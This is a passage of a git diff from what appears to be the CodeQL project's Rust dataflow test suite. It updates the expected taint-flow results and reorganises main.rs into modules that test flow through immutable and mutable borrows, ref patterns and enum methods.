provenance | | +| main.rs:36:13:36:13 | b | main.rs:39:14:39:14 | b | provenance | | +| main.rs:36:23:36:23 | a [&ref, tuple.0] | main.rs:37:13:37:19 | &... [&ref, tuple.0] | provenance | | +| main.rs:37:13:37:19 | &... [&ref, tuple.0] | main.rs:37:14:37:19 | TuplePat [tuple.0] | provenance | | +| main.rs:37:14:37:19 | TuplePat [tuple.0] | main.rs:37:15:37:15 | n | provenance | | +| main.rs:37:15:37:15 | n | main.rs:36:13:36:13 | b | provenance | | +| main.rs:51:13:51:13 | a | main.rs:52:13:52:17 | ref p | provenance | | +| main.rs:51:17:51:26 | source(...) | main.rs:51:13:51:13 | a | provenance | | +| main.rs:52:13:52:17 | ref p | main.rs:52:17:52:17 | p [&ref] | provenance | | +| main.rs:52:17:52:17 | p [&ref] | main.rs:53:15:53:15 | p [&ref] | provenance | | +| main.rs:53:15:53:15 | p [&ref] | main.rs:53:14:53:15 | * ... | provenance | | +| main.rs:57:13:57:13 | a [Some] | main.rs:58:15:58:15 | a [Some] | provenance | | +| main.rs:57:17:57:32 | Some(...) [Some] | main.rs:57:13:57:13 | a [Some] | provenance | | +| main.rs:57:22:57:31 | source(...) | main.rs:57:17:57:32 | Some(...) [Some] | provenance | | +| main.rs:58:15:58:15 | a [Some] | main.rs:59:13:59:23 | Some(...) [Some] | provenance | | +| main.rs:59:13:59:23 | Some(...) [Some] | main.rs:59:18:59:22 | ref p | provenance | | +| main.rs:59:18:59:22 | ref p | main.rs:59:22:59:22 | p [&ref] | provenance | | +| main.rs:59:22:59:22 | p [&ref] | main.rs:59:34:59:34 | p [&ref] | provenance | | +| main.rs:59:34:59:34 | p [&ref] | main.rs:59:33:59:34 | * ... | provenance | | +| main.rs:73:10:73:10 | [post] b [&ref] | main.rs:74:15:74:15 | b [&ref] | provenance | | +| main.rs:73:14:73:23 | source(...) | main.rs:73:10:73:10 | [post] b [&ref] | provenance | | +| main.rs:74:15:74:15 | b [&ref] | main.rs:74:14:74:15 | * ... | provenance | | +| main.rs:105:10:105:10 | [post] c [&ref] | main.rs:106:15:106:15 | c [&ref] | provenance | | +| main.rs:105:14:105:23 | source(...) | main.rs:105:10:105:10 | [post] c [&ref] | provenance | | +| main.rs:106:15:106:15 | c [&ref] | main.rs:106:14:106:15 | * ... | provenance | | +| main.rs:112:13:112:21 | ref mut a | main.rs:112:21:112:21 | a [&ref] | provenance | | +| main.rs:112:21:112:21 | a [&ref] | main.rs:113:15:113:15 | a [&ref] | provenance | | +| main.rs:112:25:112:34 | source(...) | main.rs:112:13:112:21 | ref mut a | provenance | | +| main.rs:113:15:113:15 | a [&ref] | main.rs:113:14:113:15 | * ... | provenance | | +| main.rs:156:18:156:21 | SelfParam [MyNumber] | main.rs:157:15:157:18 | self [MyNumber] | provenance | | +| main.rs:157:15:157:18 | self [MyNumber] | main.rs:158:13:158:38 | ...::MyNumber(...) [MyNumber] | provenance | | +| main.rs:158:13:158:38 | ...::MyNumber(...) [MyNumber] | main.rs:158:32:158:37 | number | provenance | | +| main.rs:158:32:158:37 | number | main.rs:156:31:160:5 | { ... } | provenance | | +| main.rs:162:12:162:16 | SelfParam [&ref, MyNumber] | main.rs:163:15:163:18 | self [&ref, MyNumber] | provenance | | +| main.rs:163:15:163:18 | self [&ref, MyNumber] | main.rs:164:13:164:39 | &... [&ref, MyNumber] | provenance | | +| main.rs:164:13:164:39 | &... [&ref, MyNumber] | main.rs:164:14:164:39 | ...::MyNumber(...) [MyNumber] | provenance | | +| main.rs:164:14:164:39 | ...::MyNumber(...) [MyNumber] | main.rs:164:33:164:38 | number | provenance | | +| main.rs:164:33:164:38 | number | main.rs:162:26:166:5 | { ... } | provenance | | +| main.rs:174:13:174:21 | my_number [MyNumber] | main.rs:175:14:175:22 | my_number [MyNumber] | provenance | | +| main.rs:174:25:174:54 | ...::MyNumber(...) [MyNumber] | main.rs:174:13:174:21 | my_number [MyNumber] | provenance | | +| main.rs:174:44:174:53 | source(...) | main.rs:174:25:174:54 | ...::MyNumber(...) [MyNumber] | provenance | | +| main.rs:175:14:175:22 | my_number [MyNumber] | main.rs:156:18:156:21 | SelfParam [MyNumber] | provenance | | +| main.rs:175:14:175:22 | my_number [MyNumber] | main.rs:175:14:175:34 | my_number.to_number(...) | provenance | | +| main.rs:179:13:179:21 | my_number [MyNumber] | main.rs:180:16:180:24 | my_number [MyNumber] | provenance | | +| main.rs:179:25:179:54 | ...::MyNumber(...) [MyNumber] | main.rs:179:13:179:21 | my_number [MyNumber] | provenance | | +| main.rs:179:44:179:53 | source(...) | main.rs:179:25:179:54 | ...::MyNumber(...) [MyNumber] | provenance | | +| main.rs:180:15:180:24 | &my_number [&ref, MyNumber] | main.rs:162:12:162:16 | SelfParam [&ref, MyNumber] | provenance | | +| main.rs:180:15:180:24 | &my_number [&ref, MyNumber] | main.rs:180:14:180:31 | ... .get(...) | provenance | | +| main.rs:180:16:180:24 | my_number [MyNumber] | main.rs:180:15:180:24 | &my_number [&ref, MyNumber] | provenance | | +| main.rs:200:29:200:38 | ...: i64 | main.rs:201:14:201:18 | value | provenance | | +| main.rs:201:10:201:10 | [post] n [&ref] | main.rs:200:16:200:26 | ...: ... [Return] [&ref] | provenance | | +| main.rs:201:14:201:18 | value | main.rs:201:10:201:10 | [post] n [&ref] | provenance | | +| main.rs:210:17:210:17 | [post] p [&ref] | main.rs:211:15:211:15 | p [&ref] | provenance | | +| main.rs:210:20:210:29 | source(...) | main.rs:200:29:200:38 | ...: i64 | provenance | | +| main.rs:210:20:210:29 | source(...) | main.rs:210:17:210:17 | [post] p [&ref] | provenance | | +| main.rs:211:15:211:15 | p [&ref] | main.rs:211:14:211:15 | * ... | provenance | | nodes -| main.rs:13:9:13:9 | a | semmle.label | a | -| main.rs:13:13:13:22 | source(...) | semmle.label | source(...) | -| main.rs:14:9:14:9 | b [&ref] | semmle.label | b [&ref] | -| main.rs:14:13:14:14 | &a [&ref] | semmle.label | &a [&ref] | -| main.rs:14:14:14:14 | a | semmle.label | a | -| main.rs:15:9:15:9 | c | semmle.label | c | -| main.rs:15:13:15:14 | * ... | semmle.label | * ... | -| main.rs:15:14:15:14 | b [&ref] | semmle.label | b [&ref] | -| main.rs:16:10:16:10 | c | semmle.label | c | -| main.rs:31:6:31:6 | [post] b [&ref] | semmle.label | [post] b [&ref] | -| main.rs:31:10:31:19 | source(...) | semmle.label | source(...) | -| main.rs:32:10:32:11 | * ... | semmle.label | * ... | -| main.rs:32:11:32:11 | b [&ref] | semmle.label | b [&ref] | -| main.rs:37:25:37:26 | &... [&ref] | semmle.label | &... [&ref] | -| main.rs:37:25:37:32 | ...: ... [&ref] | semmle.label | ...: ... [&ref] | -| main.rs:37:26:37:26 | n | semmle.label | n | -| main.rs:38:10:38:10 | n | semmle.label | n | -| main.rs:42:9:42:11 | val | semmle.label | val | -| main.rs:42:15:42:24 | source(...) | semmle.label | source(...) | -| main.rs:43:26:43:29 | &val [&ref] | semmle.label | &val [&ref] | -| main.rs:43:27:43:29 | val | semmle.label | val | -| main.rs:50:13:50:13 | a | semmle.label | a | -| main.rs:50:17:50:26 | source(...) | semmle.label | source(...) | -| main.rs:51:13:51:17 | ref p | semmle.label | ref p | -| main.rs:51:17:51:17 | p [&ref] | semmle.label | p [&ref] | -| main.rs:52:14:52:15 | * ... | semmle.label | * ... | -| main.rs:52:15:52:15 | p [&ref] | semmle.label | p [&ref] | -| main.rs:56:13:56:21 | ref mut a | semmle.label | ref mut a | -| main.rs:56:21:56:21 | a [&ref] | semmle.label | a [&ref] | -| main.rs:56:25:56:34 | source(...) | semmle.label | source(...) | -| main.rs:57:14:57:15 | * ... | semmle.label | * ... | -| main.rs:57:15:57:15 | a [&ref] | semmle.label | a [&ref] | -| main.rs:63:13:63:13 | a [Some] | semmle.label | a [Some] | -| main.rs:63:17:63:32 | Some(...) [Some] | semmle.label | Some(...) [Some] | -| main.rs:63:22:63:31 | source(...) | semmle.label | source(...) | -| main.rs:64:23:64:23 | a [Some] | semmle.label | a [Some] | -| main.rs:65:13:65:23 | Some(...) [Some] | semmle.label | Some(...) [Some] | -| main.rs:65:18:65:22 | ref p | semmle.label | ref p | -| main.rs:65:22:65:22 | p [&ref] | semmle.label | p [&ref] | -| main.rs:65:33:65:34 | * ... | semmle.label | * ... | -| main.rs:65:34:65:34 | p [&ref] | semmle.label | p [&ref] | -| main.rs:76:18:76:21 | SelfParam [MyNumber] | semmle.label | SelfParam [MyNumber] | -| main.rs:76:31:80:5 | { ... } | semmle.label | { ... } | -| main.rs:77:15:77:18 | self [MyNumber] | semmle.label | self [MyNumber] | -| main.rs:78:13:78:38 | ...::MyNumber(...) [MyNumber] | semmle.label | ...::MyNumber(...) [MyNumber] | -| main.rs:78:32:78:37 | number | semmle.label | number | -| main.rs:82:19:82:23 | SelfParam [&ref, MyNumber] | semmle.label | SelfParam [&ref, MyNumber] | -| main.rs:82:33:86:5 | { ... } | semmle.label | { ... } | -| main.rs:83:15:83:18 | self [&ref, MyNumber] | semmle.label | self [&ref, MyNumber] | -| main.rs:84:13:84:39 | &... [&ref, MyNumber] | semmle.label | &... [&ref, MyNumber] | -| main.rs:84:14:84:39 | ...::MyNumber(...) [MyNumber] | semmle.label | ...::MyNumber(...) [MyNumber] | -| main.rs:84:33:84:38 | number | semmle.label | number | -| main.rs:90:9:90:17 | my_number [MyNumber] | semmle.label | my_number [MyNumber] | -| main.rs:90:21:90:50 | ...::MyNumber(...) [MyNumber] | semmle.label | ...::MyNumber(...) [MyNumber] | -| main.rs:90:40:90:49 | source(...) | semmle.label | source(...) | -| main.rs:91:10:91:18 | my_number [MyNumber] | semmle.label | my_number [MyNumber] | -| main.rs:91:10:91:30 | my_number.to_number(...) | semmle.label | my_number.to_number(...) | -| main.rs:100:9:100:17 | my_number [&ref, MyNumber] | semmle.label | my_number [&ref, MyNumber] | -| main.rs:100:21:100:51 | &... [&ref, MyNumber] | semmle.label | &... [&ref, MyNumber] | -| main.rs:100:22:100:51 | ...::MyNumber(...) [MyNumber] | semmle.label | ...::MyNumber(...) [MyNumber] | -| main.rs:100:41:100:50 | source(...) | semmle.label | source(...) | -| main.rs:101:10:101:18 | my_number [&ref, MyNumber] | semmle.label | my_number [&ref, MyNumber] | -| main.rs:101:10:101:31 | my_number.get_number(...) | semmle.label | my_number.get_number(...) | -| main.rs:105:9:105:9 | a [&ref, tuple.0] | semmle.label | a [&ref, tuple.0] | -| main.rs:105:13:105:28 | &... [&ref, tuple.0] | semmle.label | &... [&ref, tuple.0] | -| main.rs:105:14:105:28 | TupleExpr [tuple.0] | semmle.label | TupleExpr [tuple.0] | -| main.rs:105:15:105:24 | source(...) | semmle.label | source(...) | -| main.rs:108:9:108:9 | b | semmle.label | b | -| main.rs:108:19:108:19 | a [&ref, tuple.0] | semmle.label | a [&ref, tuple.0] | -| main.rs:109:9:109:15 | &... [&ref, tuple.0] | semmle.label | &... [&ref, tuple.0] | -| main.rs:109:10:109:15 | TuplePat [tuple.0] | semmle.label | TuplePat [tuple.0] | -| main.rs:109:11:109:11 | n | semmle.label | n | -| main.rs:111:10:111:10 | b | semmle.label | b | +| main.rs:17:13:17:13 | a | semmle.label | a | +| main.rs:17:17:17:26 | source(...) | semmle.label | source(...) | +| main.rs:18:13:18:13 | b [&ref] | semmle.label | b [&ref] | +| main.rs:18:17:18:18 | &a [&ref] | semmle.label | &a [&ref] | +| main.rs:18:18:18:18 | a | semmle.label | a | +| main.rs:19:13:19:13 | c | semmle.label | c | +| main.rs:19:17:19:18 | * ... | semmle.label | * ... | +| main.rs:19:18:19:18 | b [&ref] | semmle.label | b [&ref] | +| main.rs:20:14:20:14 | c | semmle.label | c | +| main.rs:23:29:23:30 | &... [&ref] | semmle.label | &... [&ref] | +| main.rs:23:29:23:36 | ...: ... [&ref] | semmle.label | ...: ... [&ref] | +| main.rs:23:30:23:30 | n | semmle.label | n | +| main.rs:24:14:24:14 | n | semmle.label | n | +| main.rs:28:13:28:15 | val | semmle.label | val | +| main.rs:28:19:28:28 | source(...) | semmle.label | source(...) | +| main.rs:29:30:29:33 | &val [&ref] | semmle.label | &val [&ref] | +| main.rs:29:31:29:33 | val | semmle.label | val | +| main.rs:33:13:33:13 | a [&ref, tuple.0] | semmle.label | a [&ref, tuple.0] | +| main.rs:33:17:33:32 | &... [&ref, tuple.0] | semmle.label | &... [&ref, tuple.0] | +| main.rs:33:18:33:32 | TupleExpr [tuple.0] | semmle.label | TupleExpr [tuple.0] | +| main.rs:33:19:33:28 | source(...) | semmle.label | source(...) | +| main.rs:36:13:36:13 | b | semmle.label | b | +| main.rs:36:23:36:23 | a [&ref, tuple.0] | semmle.label | a [&ref, tuple.0] | +| main.rs:37:13:37:19 | &... [&ref, tuple.0] | semmle.label | &... [&ref, tuple.0] | +| main.rs:37:14:37:19 | TuplePat [tuple.0] | semmle.label | TuplePat [tuple.0] | +| main.rs:37:15:37:15 | n | semmle.label | n | +| main.rs:39:14:39:14 | b | semmle.label | b | +| main.rs:51:13:51:13 | a | semmle.label | a | +| main.rs:51:17:51:26 | source(...) | semmle.label | source(...) | +| main.rs:52:13:52:17 | ref p | semmle.label | ref p | +| main.rs:52:17:52:17 | p [&ref] | semmle.label | p [&ref] | +| main.rs:53:14:53:15 | * ... | semmle.label | * ... | +| main.rs:53:15:53:15 | p [&ref] | semmle.label | p [&ref] | +| main.rs:57:13:57:13 | a [Some] | semmle.label | a [Some] | +| main.rs:57:17:57:32 | Some(...) [Some] | semmle.label | Some(...) [Some] | +| main.rs:57:22:57:31 | source(...) | semmle.label | source(...) | +| main.rs:58:15:58:15 | a [Some] | semmle.label | a [Some] | +| main.rs:59:13:59:23 | Some(...) [Some] | semmle.label | Some(...) [Some] | +| main.rs:59:18:59:22 | ref p | semmle.label | ref p | +| main.rs:59:22:59:22 | p [&ref] | semmle.label | p [&ref] | +| main.rs:59:33:59:34 | * ... | semmle.label | * ... | +| main.rs:59:34:59:34 | p [&ref] | semmle.label | p [&ref] | +| main.rs:73:10:73:10 | [post] b [&ref] | semmle.label | [post] b [&ref] | +| main.rs:73:14:73:23 | source(...) | semmle.label | source(...) | +| main.rs:74:14:74:15 | * ... | semmle.label | * ... | +| main.rs:74:15:74:15 | b [&ref] | semmle.label | b [&ref] | +| main.rs:105:10:105:10 | [post] c [&ref] | semmle.label | [post] c [&ref] | +| main.rs:105:14:105:23 | source(...) | semmle.label | source(...) | +| main.rs:106:14:106:15 | * ... | semmle.label | * ... | +| main.rs:106:15:106:15 | c [&ref] | semmle.label | c [&ref] | +| main.rs:112:13:112:21 | ref mut a | semmle.label | ref mut a | +| main.rs:112:21:112:21 | a [&ref] | semmle.label | a [&ref] | +| main.rs:112:25:112:34 | source(...) | semmle.label | source(...) | +| main.rs:113:14:113:15 | * ... | semmle.label | * ... | +| main.rs:113:15:113:15 | a [&ref] | semmle.label | a [&ref] | +| main.rs:156:18:156:21 | SelfParam [MyNumber] | semmle.label | SelfParam [MyNumber] | +| main.rs:156:31:160:5 | { ... } | semmle.label | { ... } | +| main.rs:157:15:157:18 | self [MyNumber] | semmle.label | self [MyNumber] | +| main.rs:158:13:158:38 | ...::MyNumber(...) [MyNumber] | semmle.label | ...::MyNumber(...) [MyNumber] | +| main.rs:158:32:158:37 | number | semmle.label | number | +| main.rs:162:12:162:16 | SelfParam [&ref, MyNumber] | semmle.label | SelfParam [&ref, MyNumber] | +| main.rs:162:26:166:5 | { ... } | semmle.label | { ... } | +| main.rs:163:15:163:18 | self [&ref, MyNumber] | semmle.label | self [&ref, MyNumber] | +| main.rs:164:13:164:39 | &... [&ref, MyNumber] | semmle.label | &... [&ref, MyNumber] | +| main.rs:164:14:164:39 | ...::MyNumber(...) [MyNumber] | semmle.label | ...::MyNumber(...) [MyNumber] | +| main.rs:164:33:164:38 | number | semmle.label | number | +| main.rs:174:13:174:21 | my_number [MyNumber] | semmle.label | my_number [MyNumber] | +| main.rs:174:25:174:54 | ...::MyNumber(...) [MyNumber] | semmle.label | ...::MyNumber(...) [MyNumber] | +| main.rs:174:44:174:53 | source(...) | semmle.label | source(...) | +| main.rs:175:14:175:22 | my_number [MyNumber] | semmle.label | my_number [MyNumber] | +| main.rs:175:14:175:34 | my_number.to_number(...) | semmle.label | my_number.to_number(...) | +| main.rs:179:13:179:21 | my_number [MyNumber] | semmle.label | my_number [MyNumber] | +| main.rs:179:25:179:54 | ...::MyNumber(...) [MyNumber] | semmle.label | ...::MyNumber(...) [MyNumber] | +| main.rs:179:44:179:53 | source(...) | semmle.label | source(...) | +| main.rs:180:14:180:31 | ... .get(...) | semmle.label | ... .get(...) | +| main.rs:180:15:180:24 | &my_number [&ref, MyNumber] | semmle.label | &my_number [&ref, MyNumber] | +| main.rs:180:16:180:24 | my_number [MyNumber] | semmle.label | my_number [MyNumber] | +| main.rs:200:16:200:26 | ...: ... [Return] [&ref] | semmle.label | ...: ... [Return] [&ref] | +| main.rs:200:29:200:38 | ...: i64 | semmle.label | ...: i64 | +| main.rs:201:10:201:10 | [post] n [&ref] | semmle.label | [post] n [&ref] | +| main.rs:201:14:201:18 | value | semmle.label | value | +| main.rs:210:17:210:17 | [post] p [&ref] | semmle.label | [post] p [&ref] | +| main.rs:210:20:210:29 | source(...) | semmle.label | source(...) | +| main.rs:211:14:211:15 | * ... | semmle.label | * ... | +| main.rs:211:15:211:15 | p [&ref] | semmle.label | p [&ref] | subpaths -| main.rs:91:10:91:18 | my_number [MyNumber] | main.rs:76:18:76:21 | SelfParam [MyNumber] | main.rs:76:31:80:5 | { ... } | main.rs:91:10:91:30 | my_number.to_number(...) | -| main.rs:101:10:101:18 | my_number [&ref, MyNumber] | main.rs:82:19:82:23 | SelfParam [&ref, MyNumber] | main.rs:82:33:86:5 | { ... } | main.rs:101:10:101:31 | my_number.get_number(...) | +| main.rs:175:14:175:22 | my_number [MyNumber] | main.rs:156:18:156:21 | SelfParam [MyNumber] | main.rs:156:31:160:5 | { ... } | main.rs:175:14:175:34 | my_number.to_number(...) | +| main.rs:180:15:180:24 | &my_number [&ref, MyNumber] | main.rs:162:12:162:16 | SelfParam [&ref, MyNumber] | main.rs:162:26:166:5 | { ... } | main.rs:180:14:180:31 | ... .get(...) | +| main.rs:210:20:210:29 | source(...) | main.rs:200:29:200:38 | ...: i64 | main.rs:200:16:200:26 | ...: ... [Return] [&ref] | main.rs:210:17:210:17 | [post] p [&ref] | testFailures #select -| main.rs:16:10:16:10 | c | main.rs:13:13:13:22 | source(...) | main.rs:16:10:16:10 | c | $@ | main.rs:13:13:13:22 | source(...) | source(...) | -| main.rs:32:10:32:11 | * ... | main.rs:31:10:31:19 | source(...) | main.rs:32:10:32:11 | * ... | $@ | main.rs:31:10:31:19 | source(...) | source(...) | -| main.rs:38:10:38:10 | n | main.rs:42:15:42:24 | source(...) | main.rs:38:10:38:10 | n | $@ | main.rs:42:15:42:24 | source(...) | source(...) | -| main.rs:52:14:52:15 | * ... | main.rs:50:17:50:26 | source(...) | main.rs:52:14:52:15 | * ... | $@ | main.rs:50:17:50:26 | source(...) | source(...) | -| main.rs:57:14:57:15 | * ... | main.rs:56:25:56:34 | source(...) | main.rs:57:14:57:15 | * ... | $@ | main.rs:56:25:56:34 | source(...) | source(...) | -| main.rs:65:33:65:34 | * ... | main.rs:63:22:63:31 | source(...) | main.rs:65:33:65:34 | * ... | $@ | main.rs:63:22:63:31 | source(...) | source(...) | -| main.rs:91:10:91:30 | my_number.to_number(...) | main.rs:90:40:90:49 | source(...) | main.rs:91:10:91:30 | my_number.to_number(...) | $@ | main.rs:90:40:90:49 | source(...) | source(...) | -| main.rs:101:10:101:31 | my_number.get_number(...) | main.rs:100:41:100:50 | source(...) | main.rs:101:10:101:31 | my_number.get_number(...) | $@ | main.rs:100:41:100:50 | source(...) | source(...) | -| main.rs:111:10:111:10 | b | main.rs:105:15:105:24 | source(...) | main.rs:111:10:111:10 | b | $@ | main.rs:105:15:105:24 | source(...) | source(...) | +| main.rs:20:14:20:14 | c | main.rs:17:17:17:26 | source(...) | main.rs:20:14:20:14 | c | $@ | main.rs:17:17:17:26 | source(...) | source(...) | +| main.rs:24:14:24:14 | n | main.rs:28:19:28:28 | source(...) | main.rs:24:14:24:14 | n | $@ | main.rs:28:19:28:28 | source(...) | source(...) | +| main.rs:39:14:39:14 | b | main.rs:33:19:33:28 | source(...) | main.rs:39:14:39:14 | b | $@ | main.rs:33:19:33:28 | source(...) | source(...) | +| main.rs:53:14:53:15 | * ... | main.rs:51:17:51:26 | source(...) | main.rs:53:14:53:15 | * ... | $@ | main.rs:51:17:51:26 | source(...) | source(...) | +| main.rs:59:33:59:34 | * ... | main.rs:57:22:57:31 | source(...) | main.rs:59:33:59:34 | * ... | $@ | main.rs:57:22:57:31 | source(...) | source(...) | +| main.rs:74:14:74:15 | * ... | main.rs:73:14:73:23 | source(...) | main.rs:74:14:74:15 | * ... | $@ | main.rs:73:14:73:23 | source(...) | source(...) | +| main.rs:106:14:106:15 | * ... | main.rs:105:14:105:23 | source(...) | main.rs:106:14:106:15 | * ... | $@ | main.rs:105:14:105:23 | source(...) | source(...) | +| main.rs:113:14:113:15 | * ... | main.rs:112:25:112:34 | source(...) | main.rs:113:14:113:15 | * ... | $@ | main.rs:112:25:112:34 | source(...) | source(...) | +| main.rs:175:14:175:34 | my_number.to_number(...) | main.rs:174:44:174:53 | source(...) | main.rs:175:14:175:34 | my_number.to_number(...) | $@ | main.rs:174:44:174:53 | source(...) | source(...) | +| main.rs:180:14:180:31 | ... .get(...) | main.rs:179:44:179:53 | source(...) | main.rs:180:14:180:31 | ... .get(...) | $@ | main.rs:179:44:179:53 | source(...) | source(...) | +| main.rs:211:14:211:15 | * ... | main.rs:210:20:210:29 | source(...) | main.rs:211:14:211:15 | * ... | $@ | main.rs:210:20:210:29 | source(...) | source(...) | diff --git a/rust/ql/test/library-tests/dataflow/pointers/main.rs b/rust/ql/test/library-tests/dataflow/pointers/main.rs index d9d5a5298d25..6eb1e8b544d5 100644 --- a/rust/ql/test/library-tests/dataflow/pointers/main.rs +++ b/rust/ql/test/library-tests/dataflow/pointers/main.rs @@ -9,49 +9,105 @@ fn sink(s: i64) { println!("{}", s); } -fn read_through_borrow() { - let a = source(21); - let b = &a; - let c = *b; - sink(c); // $ hasValueFlow=21 -} +// Intraprocedural tests involving immutable borrows +mod intraprocedural_immutable_borrows { + use super::{sink, source}; -fn write_through_borrow() { - let mut a = 1; - sink(a); - let b = &mut a; - *b = source(39); - sink(a); // $ MISSING: hasValueFlow=39 -} + pub fn read_through_borrow() { + let a = source(21); + let b = &a; + let c = *b; + sink(c); // $ hasValueFlow=21 + } -fn write_and_read_through_borrow() { - let mut a = 12; - let b = &mut a; - sink(*b); - *b = source(37); - sink(*b); // $ hasValueFlow=37 - *b = 0; - sink(*b); // now cleared -} + fn takes_borrowed_value(&n: &i64) { + sink(n); // $ hasValueFlow=83 + } -fn takes_borrowed_value(&n: &i64) { - sink(n); // $ hasValueFlow=83 -} + pub fn pass_borrowed_value() { + let val = source(83); + takes_borrowed_value(&val); + } -fn pass_borrowed_value() { - let val = source(83); - takes_borrowed_value(&val); -} + pub fn ref_nested_pattern_match() { + let a = &(source(23), 1); -mod test_ref_pattern { - use super::{sink, source}; + // Match "in order", reference pattern then tuple pattern + let b = match a { + &(n, _) => n, + }; + sink(b); // $ hasValueFlow=23 - pub fn read_through_ref() { + // Match "out of order", tuple pattern then deref pattern + let c = match a { + (n, _) => match n { + &i => i, + }, + }; + sink(c); // $ MISSING: hasValueFlow=23 + } + + pub fn read_through_ref_pattern() { let a = source(21); let ref p = a; sink(*p); // $ hasValueFlow=21 } + pub fn ref_pattern_in_match() { + let a = Some(source(17)); + match a { + Some(ref p) => sink(*p), // $ hasValueFlow=17 + None => (), + }; + } +} + +// Intraprocedural tests involving mutable borrows +mod intraprocedural_mutable_borrows { + use super::{sink, source}; + + pub fn write_and_read_through_borrow() { + let mut a = 12; + let b = &mut a; + sink(*b); + *b = source(37); + sink(*b); // $ hasValueFlow=37 + *b = 0; + sink(*b); // now cleared + } + + pub fn write_through_borrow() { + let mut a = 1; + sink(a); + let b = &mut a; + *b = source(39); + sink(a); // $ MISSING: hasValueFlow=39 + } + + pub fn write_borrow_directly() { + let mut a = 1; + sink(a); + *(&mut a) = source(87); + sink(a); // $ MISSING: hasValueFlow=87 + } + + pub fn clear_through_borrow() { + let mut to_be_cleared = source(34); + let p = &mut to_be_cleared; + *p = 0; + sink(to_be_cleared); // variable is cleared + } + + pub fn write_through_borrow_in_match(cond: bool) { + let mut a = 1; + let mut b = 2; + let c = if cond { &mut a } else { &mut b }; + *c = source(24); + sink(*c); // $ hasValueFlow=24 + sink(a); // $ MISSING: hasValueFlow=24 + sink(b); // $ MISSING: hasValueFlow=24 + } + pub fn write_through_ref_mut() { let ref mut a = source(78); sink(*a); // $ hasValueFlow=78 @@ -59,19 +115,43 @@ mod test_ref_pattern { sink(*a); // now cleared } - pub fn ref_pattern_in_match() { - let a = Some(source(17)); - let b = match a { - Some(ref p) => sink(*p), // $ hasValueFlow=17 - None => (), - }; + pub fn mutate_tuple() { + let mut t = (1, 2, 3); + sink(t.1); + let r = &mut t.1; + *r = source(48); + sink(t.1); // $ MISSING: hasValueFlow=48 + let r = &mut t.1; + *r = 0; + sink(t.1); // now cleared + } + + pub fn tuple_match_mut() { + let mut a = (0, 1); + sink(a.0); + sink(a.1); + match a { + (ref mut x, ref mut y) => { + *x = source(71); + *y = 2; + } + } + sink(a.0); // $ MISSING: hasValueFlow=71 + sink(a.1); } } +#[derive(Copy, Clone)] enum MyNumber { MyNumber(i64), } +fn to_number(m: MyNumber) -> i64 { + match m { + MyNumber::MyNumber(number) => number, + } +} + impl MyNumber { fn to_number(self) -> i64 { match self { @@ -79,58 +159,129 @@ impl MyNumber { } } - fn get_number(&self) -> i64 { + fn get(&self) -> i64 { match self { &MyNumber::MyNumber(number) => number, } } } -fn through_self_in_method_no_borrow() { - let my_number = MyNumber::MyNumber(source(33)); - sink(my_number.to_number()); // $ hasValueFlow=33 -} +// Interprocedural tests involving immutable borrows +mod interprocedural_immutable_borrows { + use super::*; -fn through_self_in_method_implicit_borrow() { - let my_number = MyNumber::MyNumber(source(85)); - sink(my_number.get_number()); // $ MISSING: hasValueFlow=85 -} + pub fn through_self_in_method_no_borrow() { + let my_number = MyNumber::MyNumber(source(33)); + sink(my_number.to_number()); // $ hasValueFlow=33 + } + + pub fn through_self_in_method_explicit_borrow() { + let my_number = MyNumber::MyNumber(source(40)); + sink((&my_number).get()); // $ hasValueFlow=40 + } -fn through_self_in_method_explicit_borrow() { - let my_number = &MyNumber::MyNumber(source(40)); - sink(my_number.get_number()); // $ hasValueFlow=40 + pub fn through_self_in_method_implicit_borrow() { + let my_number = MyNumber::MyNumber(source(85)); + // Implicit borrow + sink(my_number.get()); // $ MISSING: hasValueFlow=85 + } + + pub fn through_self_in_method_implicit_deref() { + let my_number = &MyNumber::MyNumber(source(58)); + // Implicit dereference + sink(my_number.to_number()); // $ MISSING: hasValueFlow=58 + } } -fn ref_nested_pattern_match() { - let a = &(source(23), 1); - - // Match "in order", reference pattern then tuple pattern - let b = match a { - &(n, _) => n, - }; - sink(b); // $ hasValueFlow=23 - - // Match "out of order", tuple pattern then deref pattern - let c = match a { - (n, _) => match n { - &i => i, - }, - }; - sink(c); // $ MISSING: hasValueFlow=23 +// Interprocedural tests involving mutable borrows +mod interprocedural_mutable_borrows { + use super::*; + + fn set_int(n: &mut i64, value: i64) { + *n = value; + } + + pub fn mutates_existing_borrow() { + // Passing an already borrowed value to a function and then reading from + // the same borrow. + let mut n = 0; + let p = &mut n; + sink(*p); + set_int(p, source(38)); + sink(*p); // $ hasValueFlow=38 + } + + pub fn mutate_primitive_through_function() { + // Borrowing at the call and then reading from the unborrowed variable. + let mut n = 0; + sink(n); + set_int(&mut n, source(55)); + sink(n); // $ MISSING: hasValueFlow=55 + } + + impl MyNumber { + fn set(&mut self, number: i64) { + *self = MyNumber::MyNumber(number); + } + } + + fn set_number(n: &mut MyNumber, number: i64) { + *n = MyNumber::MyNumber(number); + } + + pub fn mutate_enum_through_function() { + let mut my_number = MyNumber::MyNumber(0); + set_number(&mut my_number, source(64)); + sink(my_number.get()); // $ MISSING: hasValueFlow=64 + set_number(&mut my_number, 0); + sink(my_number.get()); // now cleared + } + + pub fn mutate_enum_through_method_implicit_borrow() { + let mut my_number = MyNumber::MyNumber(0); + // Implicit borrow. + my_number.set(source(45)); + sink(to_number(my_number)); // $ MISSING: hasValueFlow=45 + my_number.set(0); + sink(to_number(my_number)); // now cleared + } + + pub fn mutate_enum_through_method_explicit_borrow() { + let mut my_number = MyNumber::MyNumber(0); + // Explicit borrow. + (&mut my_number).set(source(99)); + sink(to_number(my_number)); // $ MISSING: hasValueFlow=99 + (&mut my_number).set(0); + sink(to_number(my_number)); // now cleared + } } -use test_ref_pattern::*; +use interprocedural_immutable_borrows::*; +use interprocedural_mutable_borrows::*; +use intraprocedural_immutable_borrows::*; +use intraprocedural_mutable_borrows::*; fn main() { read_through_borrow(); write_through_borrow(); + write_borrow_directly(); + clear_through_borrow(); + write_through_borrow_in_match(true); write_and_read_through_borrow(); pass_borrowed_value(); through_self_in_method_no_borrow(); - through_self_in_method_implicit_borrow(); through_self_in_method_explicit_borrow(); + through_self_in_method_implicit_borrow(); + through_self_in_method_implicit_deref(); + mutates_existing_borrow(); + mutate_primitive_through_function(); + mutate_enum_through_function(); + mutate_enum_through_method_implicit_borrow(); + mutate_enum_through_method_explicit_borrow(); ref_nested_pattern_match(); - read_through_ref(); + read_through_ref_pattern(); write_through_ref_mut(); ref_pattern_in_match(); + mutate_tuple(); + 